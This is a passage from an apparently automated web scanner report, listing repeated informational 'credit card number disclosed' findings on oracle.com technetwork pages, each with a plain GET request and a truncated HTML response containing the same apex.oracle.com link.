...[SNIP]...

25.38. http://www.oracle.com/technetwork/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=106;ecid=35926733983699874,0:1)
Date: Tue, 06 Sep 2011 16:09:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 200478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.39. http://www.oracle.com/technetwork/indexes/documentation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/indexes/documentation/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/indexes/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=231;ecid=35678789816681054,0:1)
Date: Tue, 06 Sep 2011 16:09:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162281

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.40. http://www.oracle.com/technetwork/indexes/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/indexes/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/indexes/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=163;ecid=41075364684343375,0:1)
Date: Tue, 06 Sep 2011 16:09:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 141667

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.41. http://www.oracle.com/technetwork/indexes/products/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/indexes/products/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/indexes/products/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41110647840983662,0:1)
Date: Tue, 06 Sep 2011 16:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136088

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.42. http://www.oracle.com/technetwork/java/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/java/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/java/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35928456265613448,0:1)
Date: Tue, 06 Sep 2011 16:09:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.43. http://www.oracle.com/technetwork/middleware/fusion-middleware/documentation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/fusion-middleware/documentation/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/middleware/fusion-middleware/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=12;ecid=41141262368570474,0:1)
Date: Tue, 06 Sep 2011 16:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162823

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.44. http://www.oracle.com/technetwork/middleware/fusion-middleware/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/fusion-middleware/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/middleware/fusion-middleware/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41116759579543136,0:1)
Date: Tue, 06 Sep 2011 16:09:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 173279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.45. http://www.oracle.com/technetwork/middleware/fusion-middleware/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/fusion-middleware/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/middleware/fusion-middleware/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35984685978300754,0:1)
Date: Tue, 06 Sep 2011 16:09:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 184955

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.46. http://www.oracle.com/technetwork/middleware/jrockit/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/jrockit/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/middleware/jrockit/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41053722343588042,0:1)
Date: Tue, 06 Sep 2011 16:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 166389

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.47. http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/middleware/soasuite/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/middleware/soasuite/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35879579537054133,0:1)
Date: Tue, 06 Sep 2011 16:09:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 252619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.48. http://www.oracle.com/technetwork/oem/downloads/index-084446.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/downloads/index-084446.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/oem/downloads/index-084446.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41075811361962283,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.49. http://www.oracle.com/technetwork/oem/grid-control/documentation/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/grid-control/documentation/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/oem/grid-control/documentation/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=5;ecid=35984896431701435,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129562

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.50. http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/grid-control/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/oem/grid-control/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=40974493081910025,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 158895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.51. http://www.oracle.com/technetwork/oem/grid-control/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oem/grid-control/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/oem/grid-control/overview/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35939369777676995,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140888

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.52. http://www.oracle.com/technetwork/oramag/magazine/home/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/oramag/magazine/home/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/oramag/magazine/home/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41075635268300620,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.53. http://www.oracle.com/technetwork/server-storage/solaris/downloads/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/server-storage/solaris/downloads/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/server-storage/solaris/downloads/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=201;ecid=41086548779348015,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.54. http://www.oracle.com/technetwork/systems/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/systems/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/systems/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41054851921233213,0:1)
Date: Tue, 06 Sep 2011 16:09:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.55. http://www.oracle.com/technetwork/topics/cloud/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/cloud/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/topics/cloud/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41157789402743118,0:1)
Date: Tue, 06 Sep 2011 16:09:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110774

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.56. http://www.oracle.com/technetwork/topics/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/topics/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=35729659410112168,0:1)
Date: Tue, 06 Sep 2011 16:08:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120251

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.57. http://www.oracle.com/technetwork/topics/newtojava/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/newtojava/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/topics/newtojava/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41070021745959460,0:1)
Date: Tue, 06 Sep 2011 16:08:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110971

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.58. http://www.oracle.com/technetwork/topics/newtojava/overview/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/newtojava/overview/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/topics/newtojava/overview/index.html HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/technetwork/topics/newtojava/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; gpv_p24=no%20value; s_cc=true; s_nr=1315343572368; gpw_e24=no%20value; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41116059499862577,0:1)
Content-Length: 135188
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:13:08 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.59. http://www.oracle.com/technetwork/topics/security/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/security/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/topics/security/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35637678389099849,0:1)
Date: Tue, 06 Sep 2011 16:08:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110791

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.60. http://www.oracle.com/technetwork/topics/soa/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/soa/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/topics/soa/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41151892412556860,0:1)
Date: Tue, 06 Sep 2011 16:08:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110778

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.61. http://www.oracle.com/technetwork/topics/virtualization/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /technetwork/topics/virtualization/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /technetwork/topics/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=245;ecid=41070124825176468,0:1)
Date: Tue, 06 Sep 2011 16:08:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 110843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('otn','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.62. http://www.oracle.com/us/community/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/community/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/community/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41183490487442251,0:1)
Date: Tue, 06 Sep 2011 16:16:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 150266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
